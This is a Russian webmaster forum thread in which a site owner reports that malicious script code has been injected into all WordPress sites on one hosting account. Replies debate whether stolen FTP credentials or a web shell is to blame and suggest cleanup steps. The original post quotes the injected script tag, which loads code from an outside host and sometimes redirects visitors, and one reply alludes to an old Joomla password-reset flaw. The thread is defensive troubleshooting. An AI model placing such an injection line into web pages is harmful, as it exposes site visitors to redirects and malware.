- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Видимо взломали FTP аккаунт т.к. на всех сайтах висящих на нем появляется код типа:
<script src="http://proc30esso.rr.nu/pmg.php?dr=1"></script>
URL меняется... Иногда редиректит иногда нет на этот URL
Пробовал обновить WP, отключал плагины, менял тему - код все равно остается...
Если кто с таким сталкивался, помогите пожалуйста...
Пароль на ftp меняли?
Видимо взломали FTP аккаунт
Не совсем верные выводы...
Взломали ваш WP через уязвимости, залили web-shell, и через него дописали всё что угодно на все сайты на аккаунте.
Никому ваш фтп и близко не нужен, так что обновляем сайты и обязательно ищем шелл.
Нужна будет помощь - стучите, помогу.
Выводы верные, судя по
Шелл, залитый через WP не будет иметь таких привилегий.
Сначала переустановить ОС, потом сменить пасс на фтп и прочее.
Выводы верные, судя по
Шелл, залитый через WP не будет иметь таких привилегий.
Сначала переустановить ОС, потом сменить пасс на фтп и прочее.
С чего это шелл не будет иметь привелегий? Ж Будет)
Шелл, залитый через WP не будет иметь таких привилегий.
Почему это не будет? Через шелл доступна вся дирректория пользователя, точно в том же объёме как и фтп аккаунт.
Сначала переустановить ОС
😮 А где ТС сказал что у него дедик или ВПС? Больше походит на обычный шаред с несколькими сайтами в аккаунте. Как он там ОС переустановит?
С чего это шелл не будет иметь привелегий? Ж Будет)
Если все сайты были созданы на одном админском акке, или ещё хуже, на рутовом, тогда да, может иметь привилегии.
Больше вводных, ТС 🙅
---------- Добавлено 01.03.2012 в 18:01 ----------
😮 А где ТС сказал что у него дедик или ВПС? Больше походит на обычный шаред с несколькими сайтами в аккаунте. Как он там ОС переустановит?
Это же очевидно, что я не имела ввиду ОС сервака.
ТС легко мог зацепить троя на свой комп.
Шелл, залитый через WP не будет иметь таких привилегий.
Чушь. Зависит от прав на хостинге, а не из какой кмс был залит шелл.
ТС легко мог зацепить троя на свой комп.
Хорошо, допустим даже и такой вариант - подцепил трояна, тот украл пароль от фтп с компа и натворил делов на сайтах, чем тут переустановка ОС поможет? Если троян на компе, то его ведь всё равно нужно найти.
Но я, извините, к этой версии не склоняюсь, вордпрессы вижу взломанные чуть ли не каждый день, и льют в них что угодно, и даже вообще с наглухо отключённым доступом по фтп всё равно льют. Да и не знаем мы на чём там остальные сайты у ТС, может там где у него джумла стоит старенькая, в которой пароль админа простой кавычкой сбрасывается, так там вообще делов на 2 минуты и никакое фтп не нужно. А может например такой вариант, с которым я очень часто сталкиваюсь - ставят движок (например на поддомен), с паролями не заморачиваются, типа просто попробовать. Пробуют пару дней, ковыряют, типа сайт делают, а потом забивают. И так и висит потом этот движок на аккаунте на каком - нибудь поддомене или в папке годами никому не нужный - а ведь это по сути настежь распахнутые двери для взлома:)
Зато вот почему то знаю людей, которые просто постоянно следят за актуальность ПО сайта и никакие "трояны" их не берут 😂
Это просто какой-то сломанный телефон. 🙅
Шелловодов то..
Качай сайт на компьютер и копай код. Я с подобным дело не имел, но первое что бы сделал, так это провёл поиск ссылки или подключенным левым js скриптам по файлам cms, чтобы сузить область поиска. Не панацея конечно, но всяко лучше тупой бесцельной паники.